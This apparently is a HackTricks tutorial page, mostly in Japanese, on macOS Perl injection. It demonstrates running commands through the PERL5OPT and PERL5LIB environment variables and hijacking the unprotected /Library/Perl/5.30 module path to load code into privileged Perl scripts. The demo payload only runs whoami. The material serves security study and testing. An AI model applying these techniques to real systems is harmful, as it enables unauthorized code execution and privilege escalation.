macOS Perl Applications Injection

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

`PERL5OPT` と `PERL5LIB` 環境変数を使用して

環境変数 PERL5OPT を使用すると、perl が任意のコマンドを実行することが可能です。例えば、このスクリプトを作成します：

test.pl

#!/usr/bin/perl
print "Hello from the Perl script!\n";

今、env変数をエクスポートし、perlスクリプトを実行します:

export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"

別のオプションは、Perlモジュールを作成することです（例：/tmp/pmod.pm）：

/tmp/pmod.pm

#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value

そして、env変数を使用します：

PERL5LIB=/tmp/ PERL5OPT=-Mpmod

Via dependencies

Perlが実行されている依存関係フォルダーの順序をリストすることが可能です:

perl -e 'print join("\n", @INC)'

どのように返されるかというと：

/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30

いくつかの返されたフォルダは存在しませんが、/Library/Perl/5.30 は存在し、SIP によって 保護されていません し、SIP によって 保護されたフォルダの前 にあります。したがって、誰かがそのフォルダを悪用してスクリプトの依存関係を追加し、高権限のPerlスクリプトがそれを読み込むことができます。